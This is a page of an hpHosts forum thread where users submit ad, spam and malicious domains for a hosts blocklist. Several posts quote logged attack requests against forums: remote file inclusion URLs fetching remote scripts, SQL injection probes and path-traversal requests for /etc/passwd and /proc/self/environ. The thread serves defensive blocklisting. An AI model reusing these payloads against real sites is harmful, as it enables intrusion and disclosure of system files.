Check Website
Inclusion Status
It is currently Thu Jan 17, 2019 11:01 pm

All times are UTC




Forum locked This topic is locked, you cannot edit posts or make further replies.  [ 53 posts ]  Go to page Previous  1, 2, 3, 4, 5, 6  Next
Author Message
 Post subject: Re: Please submit sites to be added to hpHosts, to this thre
PostPosted: Sat Mar 09, 2013 1:33 am 
Offline

Joined: Tue Sep 01, 2009 1:22 am
Posts: 264
Location: South Carolina, USA
Code:
js.moatads.com


IP Address:
hpHosts: 107.14.36.57 = RoadRunner
robtex: 67.202.58.168 = Amazon

classification: ATS

steven, i don't know what to give you as a reference for "js.moatads.com"..

http://www.dslreports.com/forum/r28081675-moatad.js



IP:
top
Top
 Profile  
Reply with quote  
 Post subject: Re: Please submit sites to be added to hpHosts, to this thre
PostPosted: Mon Mar 11, 2013 1:55 pm 
Offline
User avatar

Joined: Mon Oct 05, 2009 1:57 pm
Posts: 497
Location: Kent, UK
French Spam:
Code:
helppremium.com
elevatebest.com
news-futes.com
shoppingfashiondeals.com
frenchpacts.com
m55-nimbostratus.net
meca-market.com
vmle698.com
vml196.com
lme946.net


GRM
Code:
Host: 69.31.103.242
IP: 69.31.103.242
Referer: http://forum.cm77.com/index.php?do=/profile-12867/info/
User Agent: Mozilla/4.0 <_a href="http://Forum.Cm77.com/index.php?do=/profile-12867/info/"_>similar site<_/a_> (Windows NT 5.1; U; en) Presto/2.10.229 Version/11.60
Links though this fake profile to: http://healthychocolatecake.net/cake-recipes/tag/unsweetened-chocolate-recipes-healthy/

Host: 61.29.161.110
IP: 61.29.161.110
Referer: http://accounts-savings.blogspot.com/
User Agent: Mozilla/5.0 <_a href="http://accounts-savings.blogspot.com/"_>savings online account<_/a_> (Windows NT 5.1; U; en) Presto/2.10.229 Version/11.60

Host: 123.125.116.243
IP: 123.125.116.243
Referer: http://www.adoptioneducationclasses.com/classroom/user/view.php?id=12607&course=1
User Agent: Opera/9.80 <_a href="http://www.adoptioneducationclasses.com/classroom/user/view.php?id=12607&course=1"_>Hostgator Plans<_/a_> (Windows NT 5.1; U; en) Presto/2.10.229 Version/11.60
Note: https://www.virustotal.com/en-gb/url/830ceb83551e1b4d6adb260039d0f034a315325e6706324deac055585ce37f2b/analysis/1363007590/


GRM/PSH
Code:
Host: host-88-80-21-136.cust.prq.se
IP: 88.80.21.136
Referer: http://www.metaboliccookingreviews.org/
User Agent: Mozilla/4.0 <_a href="http://www.MetabolicCookingReviews.org/"_>mouse click the next document<_/a_> (Windows NT 5.1; U; en) Presto/2.10.229 Version/11.60
Associated with: http://www.metaboliccooking.com/affiliates/home.php
Fake Mcafee seals


RFI
Code:
Host: free001.timeweb.ru
IP: 92.53.98.21
Query: f=7&t=1258/wp-content/themes/deep-blue/timthumb.php?src=http://picasa.com.worldacumen.com/bat.php
https://www.virustotal.com/en-gb/url/c27b7cb813759572de97692d05e11d3d65b9a0dfc182990e4a78150eb396a785/analysis/1363008326/

Host: 187-40-53-114.user.veloxzone.com.br
IP: 187.40.53.114
Query: f=http://www.alub.com.br/concursos/concursos/recursos/cmd.txt?&&r=s&


PSH
Code:
Host: 113.72.105.61
IP: 113.72.105.61
Referer: http://tennisclubnieppois.free.fr/userinfo.php?uid=7334
User Agent: Mozilla/5.0 <_a href="http://tennisclubnieppois.free.fr/userinfo.php?uid=7334"_>http://tennisclubnieppois.free.fr/userinfo.php?uid=7334<_/a_> (Windows NT 5.1; U; en) Presto/2.10.229 Version/11.60
Links to: http://www.topstylefashion.me.uk/

helly.co.ua


WRZ
Code:
http://2name.com/

Host: 219.234.82.75
IP: 219.234.82.75
Referer: http://soft4all.info/free-software-download/ferrari-theme-for-windows-7/
User Agent: Mozilla/5.0 <_a href="http://soft4all.info/free-software-download/ferrari-theme-for-windows-7/"_>Hack sharecash download<_/a_> (Windows NT 5.1; U; en) Presto/2.10.229 Version/11.60



IP:
top
Top
 Profile  
Reply with quote  
 Post subject: Re: Please submit sites to be added to hpHosts, to this thre
PostPosted: Wed Mar 13, 2013 7:37 pm 
Offline
Site Admin

Joined: Thu May 28, 2009 10:25 am
Posts: 6016
redwolfe_98 wrote:
Code:
js.moatads.com


IP Address:
hpHosts: 107.14.36.57 = RoadRunner
robtex: 67.202.58.168 = Amazon

classification: ATS

steven, i don't know what to give you as a reference for "js.moatads.com"..

http://www.dslreports.com/forum/r28081675-moatad.js


Cheers, I found the references for it :)

_________________
Regards
Steven Burn
I.T. Mate / hpHosts
it-mate.co.uk / hosts-file.net

Keeping it FREE!



IP:
top
Top
 Profile  
Reply with quote  
 Post subject: Re: Please submit sites to be added to hpHosts, to this thre
PostPosted: Wed Mar 13, 2013 8:48 pm 
Offline
Site Admin

Joined: Thu May 28, 2009 10:25 am
Posts: 6016
Cheers guys :)

Sorry for taking so long.

_________________
Regards
Steven Burn
I.T. Mate / hpHosts
it-mate.co.uk / hosts-file.net

Keeping it FREE!



IP:
top
Top
 Profile  
Reply with quote  
 Post subject: Re: Please submit sites to be added to hpHosts, to this thre
PostPosted: Thu Mar 14, 2013 4:05 pm 
Offline

Joined: Thu Mar 14, 2013 3:33 pm
Posts: 1
Airpush, Leadbolt and Xapush (ATS, possibly HJK if you consider Android notification spam to be hijacking).

127.0.0.1 api.airpush.com
127.0.0.1 ad.leadbolt.net
127.0.0.1 ad.leadboltapps.net
127.0.0.1 67.222.106.169 (apparently this kind of hosts entry works on Android even though it is an IP address)



IP:
top
Top
 Profile  
Reply with quote  
 Post subject: Re: Please submit sites to be added to hpHosts, to this thre
PostPosted: Sat Mar 16, 2013 12:33 pm 
Offline
User avatar

Joined: Mon Oct 05, 2009 1:57 pm
Posts: 497
Location: Kent, UK
French Spam:
Code:
diagsv18.com
experiencedad.com


GRM
Code:
Host: 142.4.201.65.mohitseo.com
IP: 142.4.201.65
Referer: http://100-dollars-a-day.com
User Agent: Opera/9.80 <_a href="http://100-dollars-a-day.com"_>investment products<_/a_> (Windows NT 5.1; U; en) Presto/2.10.229 Version/11.60

Host: progressweight.com
IP: 216.152.251.7
Referer: http://www.dogtraininghelpnow.com
User Agent: Mozilla/5.0 <_a href="http://www.dogtraininghelpnow.com"_>search rescue dog training tampa<_/a_> (Windows NT 5.1; U; en) Presto/2.10.229 Version/11.60

Host: adsl-dyn111.91-127-173.t-com.sk
IP: 91.127.173.111
Referer: http://vicensash.com/index.php/vicens-ash-blog-javea/entry/free-salsa-dancing-classes-in-javea.html
User Agent: Mozilla/4.0 <_a href="http://vicensash.com/index.php/vicens-ash-blog-javea/entry/free-salsa-dancing-classes-in-javea.html"_>reklamná agentúra<_/a_> (Windows NT 5.1; U; en) Presto/2.10.229 Version/11.60

Host: 216.151.139.241
IP: 216.151.139.241
Referer: http://syababaqiqah.com
User Agent: Mozilla/5.0 <_a href="http://syababaqiqah.com"_>Qurban Murah<_/a_> (Windows NT 5.1; U; en) Presto/2.10.229 Version/11.60

Host: 45.206.76.188.dynamic.jazztel.es
IP: 188.76.206.45
Referer: http://www.skroo.com
User Agent: Mozilla/5.0 <_a href="http://www.skroo.com"_>cheap live sex<_/a_> (Windows NT 5.1; U; en) Presto/2.10.229 Version/11.60

Host: 188.165.73.28
IP: 188.165.73.28
Referer: http://www.nextmobilephones.com
User Agent: Opera/9.80 <_a href="http://www.nextmobilephones.com"_>Buy Smartphone<_/a_> (Windows NT 5.1; U; en) Presto/2.10.229 Version/11.60


RFI
Code:
Host: 5-248-85-169-broadband.kyivstar.net
IP: 5.248.85.169
Query: f=55&t=1893++++++++++++++++++++++++++Result:+%F4%EE%F0%F3%EC+%ED%E5+%ED%E0%E9%E4%E5%ED+/+%ED%E5+%F3%E4%E0%EB%EE%F1%FC+%EE%EF%F0%E5%E4%E5%EB%E8%F2%FC+IP

Host: 123.161.97.192
IP: 123.161.97.192
Query: f=94&t=3389%20and%205=6%20union%20select%200x5E5B7D7E,0x5E5B7D7E%20--
Query: f=94&t=3389'%20and%205=6%20union%20select%200x5E5B7D7E%20--%20And%20'6'='6
Query: f=94&t=3389%20and%205=6%20union%20select%200x5E5B7D7E%20--

Host: 245.94.87.110.board.xm.fj.dynamic.163data.com.cn
IP: 110.87.94.245
Query: mode=register&sid=d3c5e8a1a3761cb94bb3635ee1c81250+%5BPLM=0%5D%5BR%5D+GET+http://[Removed]/forum/ucp.php?mode=register&sid=d3c5e8a1a3761cb94bb3635ee1c81250+%5B0,8746,8662%5D+-%3E+%5BR%5D+POST+http://[Removed]/forum/ucp.php?mode=register+%5B0,14464,8318%5D+-%3E+%5BR%5D+POST+http://[Removed]/forum/ucp.php?mode=register+%5B0,14683,9573%5D+-%3E+%5BR%5D+POST+http://[Removed]/forum/ucp.php?mode=register+%5B0,14683,10868%5D+-%3E+%5BR%5D+POST+http://[Removed]/forum/ucp.php?mode=register+%5B0,14792,9810%5D+-%3E+%5BR%5D+POST+http://[Removed]/forum/ucp.php?mode=register+%5B0,14792,10093%5D+-%3E+%5BR%5D+POST+http://[Removed]/forum/ucp.php?mode=register+%5B4621,0,223%5D

Host: ns227509.ovh.net
IP: 176.31.234.161
Query: f=7&t=1258/wp-content/themes/deep-blue/timthumb.php?src=http://picasa.com.ritile.com/thumb.php



IP:
top
Top
 Profile  
Reply with quote  
 Post subject: Re: Please submit sites to be added to hpHosts, to this thre
PostPosted: Mon Mar 18, 2013 2:35 am 
Offline
Site Admin

Joined: Thu May 28, 2009 10:25 am
Posts: 6016
Cheers guys.

ad.leadbolt.net was already listed in hpHosts, but the rest have been checked and added.

_________________
Regards
Steven Burn
I.T. Mate / hpHosts
it-mate.co.uk / hosts-file.net

Keeping it FREE!



IP:
top
Top
 Profile  
Reply with quote  
 Post subject: Re: Please submit sites to be added to hpHosts, to this thre
PostPosted: Mon Mar 18, 2013 11:45 am 
Offline
User avatar

Joined: Mon Oct 05, 2009 1:57 pm
Posts: 497
Location: Kent, UK
French Spam:
Code:
funshoppingdeals.com
shoppingdealsweekly.com
shop.harry-lesbonsplans.com
expertbusinessgroup.com
www.oneshoppingdeal.com
annuairedesbonsplans.com
lessuperpromos.com


PSH
Code:
www.janice.in
http://instantonlinepayday.co.uk/
http://gokamagraed.blog.hr


RFI
Code:
Host: 123.53.114.161
IP: 123.53.114.161
Query: f=80&t=4101%20%61%6E%64%20%36%3D%36
Query: f=80&t=4101%20%61%6E%64%20%36%3D%35
Query: f=80&t=4101%27%20%61%6E%64%20%27%36%27%3D%27%36

Host: 47.218.74.176.host-telecom.com
IP: 176.74.218.47
Query: f=http://rewers2013.ru/1.txt?


Not seen this type of referrer string. Your wisdom appreciated.
Code:
Host: 95.141.28.55
IP: 95.141.28.55
Referer: http://thefreelancersalliance.com/nph-.dm/20/http/craftkeys.com/eset/eset-nod32-antivirus-4-username-and-password-2013/
User Agent: Mozilla/4.0 (compatible; MSIE 9.0; Trident 5.0; Windows 98; ZangoToolbar 5.5.72;GB; FDM)


HFS
Code:
http://www.esegrs.com/


Last edited by Spudz on Tue Mar 26, 2013 9:57 pm, edited 3 times in total.
additions on 24 & 26 mar



IP:
top
Top
 Profile  
Reply with quote  
 Post subject: Re: Please submit sites to be added to hpHosts, to this thre
PostPosted: Mon Mar 25, 2013 12:02 pm 
Offline
User avatar

Joined: Mon Oct 05, 2009 1:57 pm
Posts: 497
Location: Kent, UK
RFI
Code:
Host: nl5x.mullvad.net
IP: 85.17.31.120
Query: f=48&t=../../etc/passwd

Host: ks3098749.kimsufi.com
IP: 188.165.236.147
Query: option=com_ccnewsletter&controller=../../../../../../../../../../../../../../../../../../../../../../../..//proc/self/environ%0000

Host: 21r8s11.syminet.com
IP: 174.136.102.40
Query: f=9&t=504/admin/categories.php/login.php?cPath=&action=new_product_preview

Host: static-80-93-217-36.fibersunucu.com.tr
IP: 80.93.217.36
Query: f=7&t=1639++++++++++++++++++++Result:+no+post+sending+forms+are+found;

Host: hn.kd.ny.adsl
IP: 123.15.49.52
Query: f=94%20%61%6E%64%20%31%3D%31
Query: f=79&t=2483&view=previous%20%61%6E%64%20%31%3D%31
Query: f=94%20%61%6E%64%20%31%3D%32
Query: f=79&t=2483&view=previous%20%61%6E%64%20%31%3D%32

Host: 187-40-10-212.user.veloxzone.com.br
IP: 187.40.10.212
Query: f=http://president.cpru.ac.th/data/cmd.txt?&&r=s&
****  See: http://vurl.mysteryfcm.co.uk/?url=1745735  ****


GRM
Code:
Host: wc212.webcare360.com
IP: 94.242.241.111
Referer: http://www.trademinerreview.org
User Agent: Opera/9.80 <_a href="http://www.TradeMinerReview.org"_>mouse click on www.TradeMinerReview.org<_/a_> (Windows NT 5.1; U; en) Presto/2.10.229 Version/11.60

Host: 65.181.123.88
IP: 65.181.123.88
Referer: http://www.socialexchange.org
User Agent: Opera/9.80 <_a href="http://www.socialexchange.org"_>buy your followers<_/a_> (Windows NT 5.1; U; en) Presto/2.10.229 Version/11.60

Host: 100.220.40.59.broad.sz.gd.dynamic.163data.com.cn
IP: 59.40.220.100
Referer: http://www.officielguessfr.com
User Agent: Mozilla/4.0 <_a href="http://www.officielguessfr.com"_>sac a main guess hiver 2011<_/a_> (Windows NT 5.1; U; en) Presto/2.10.229 Version/11.60

Host: 190.214.41.90
IP: 190.214.41.90
Referer: http://mycheapvacations.net/costarica/
User Agent: Mozilla/5.0 <_a href="http://mycheapvacations.net/costarica/"_>Costa Rica vacations cheap<_/a_> (Windows NT 5.1; U; en) Presto/2.10.229 Version/11.60

Host: 113.212.68.135
IP: 113.212.68.135
Referer: http://instromusic.com/kanye-west-everything-i-am-instrumental/
User Agent: Mozilla/4.0 <_a href="http://instromusic.com/kanye-west-everything-i-am-instrumental/"_>everything i am instrumental<_/a_> (Windows NT 5.1; U; en) Presto/2.10.229 Version/11.60

Host: static-80-93-217-38.fibersunucu.com.tr
IP: 80.93.217.38
Referer: http://tantricmassagelondonx.com/
User Agent: Opera/9.80 <_a href="http://tantricmassagelondonx.com/"_>tantra<_/a_> (Windows NT 5.1; U; en) Presto/2.10.229 Version/11.60

Host: host-88-80-20-184.cust.prq.se
IP: 88.80.20.184
Referer: http://www.lonlockwoodelectric.com/
User Agent: Mozilla/4.0 <_a href="http://www.lonlockwoodelectric.com/"_>electrical contractor Rochester Ny<_/a_> (Windows NT 5.1; U; en) Presto/2.10.229 Version/11.60

Host: 113.212.68.49
IP: 113.212.68.49
Referer: http://hualalaivilla4rent.com
User Agent: Opera/9.80 <_a href="http://hualalaivilla4rent.com"_>Home News<_/a_> (Windows NT 5.1; U; en) Presto/2.10.229 Version/11.60

Host: 183.27.17.107
IP: 183.27.17.107
Referer: http://statusnet.bastianhofmann.de/ferntalbo
User Agent: Mozilla/5.0 <_a href="http://statusnet.bastianhofmann.de/ferntalbo"_>http://www.shoppingamazing.com<_/a_> (Windows NT 5.1; U; en) Presto/2.10.229 Version/11.60

Host: ip-176-195-19-76.bb.netbynet.ru
IP: 176.195.19.76
Referer: http://hqsteroids.com

Host: 125.39.238.242
IP: 125.39.238.242
Referer: http://allinclusive.arubavacationmap.com/cheap-vacations/
User Agent: Mozilla/4.0 <_a href="http://allinclusive.arubavacationmap.com/cheap-vacations/"_>cheap deals to Aruba<_/a_> (Windows NT 5.1; U; en) Presto/2.10.229 Version/11.60

Host: 50.117.69.196
IP: 50.117.69.196
Referer: http://lemonadedietexposed.net/
User Agent: Mozilla/5.0 <a href="http://lemonadedietexposed.net/">Http://Lemonadedietexposed.Net</a> (Windows NT 5.1; U; en) Presto/2.10.229 Version/11.60

Host: 95.159.105.2
IP: 95.159.105.2
Referer: http://www.inna.net.pl/
User Agent: Opera/9.80 <_a href="http://www.inna.net.pl/"_>nadruki na stroje sportowe<_/a_> (Windows NT 5.1; U; en) Presto/2.10.229 Version/11.60

Host: eli217.neoplus.adsl.tpnet.pl
IP: 83.21.202.217
Referer: http://pozycjonowanie-stron-poznan.org.pl/
User Agent: Mozilla/4.0 <_a href="http://pozycjonowanie-stron-poznan.org.pl/"_>pozycjonowanie stron Poznań<_/a_> (Windows NT 5.1; U; en) Presto/2.10.229 Version/11.60

Host: wc212.webcare360.com
IP: 94.242.241.73
Referer: http://www.anaboliccookingreviews.info/
User Agent: Mozilla/4.0 <_a href="http://www.AnabolicCookingReviews.info/"_>http://www.AnabolicCookingReviews.info<_/a_> (Windows NT 5.1; U; en) Presto/2.10.229 Version/11.60

Host: 69.46.79.235
IP: 69.46.79.235
Referer: http://slaphappyreview.com/
User Agent: Opera/9.80 <_a href="http://Slaphappyreview.com/"_>homepage<_/a_> (Windows NT 5.1; U; en) Presto/2.10.229 Version/11.60

Host: 87.236.211.239
IP: 87.236.211.239
Referer: http://experts-review.info/guide_to_buying_&_selling_cell_phones
User Agent: Mozilla/5.0 <_a href="http://experts-review.info/Guide_To_Buying_&_Selling_Cell_Phones"_>cell phones cheap<_/a_> (Windows NT 5.1; U; en) Presto/2.10.229 Version/11.60


Last edited by Spudz on Wed Mar 27, 2013 11:08 am, edited 6 times in total.
Updated 27 Mar



IP:
top
Top
 Profile  
Reply with quote  
 Post subject: Re: Please submit sites to be added to hpHosts, to this thre
PostPosted: Wed Mar 27, 2013 11:28 pm 
Offline
Site Admin

Joined: Thu May 28, 2009 10:25 am
Posts: 6016
Cheers :)

ref: URL with craftkeys.com, it's attempting to mislead into thinking it's not the actual target/source, but URL actually redirects there.

_________________
Regards
Steven Burn
I.T. Mate / hpHosts
it-mate.co.uk / hosts-file.net

Keeping it FREE!



IP:
top
Top
 Profile  
Reply with quote  
Display posts from previous:  Sort by  
Forum locked This topic is locked, you cannot edit posts or make further replies.  [ 53 posts ]  Go to page Previous  1, 2, 3, 4, 5, 6  Next

All times are UTC


Who is online

Users browsing this forum: No registered users and 4 guests


You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot post attachments in this forum

Search for:
Jump to:  
hpHosts and hpHosts Online are copyright © Malwarebytes Corp - All Rights Reserved

Powered by phpBB © 2000-2009 phpBB Group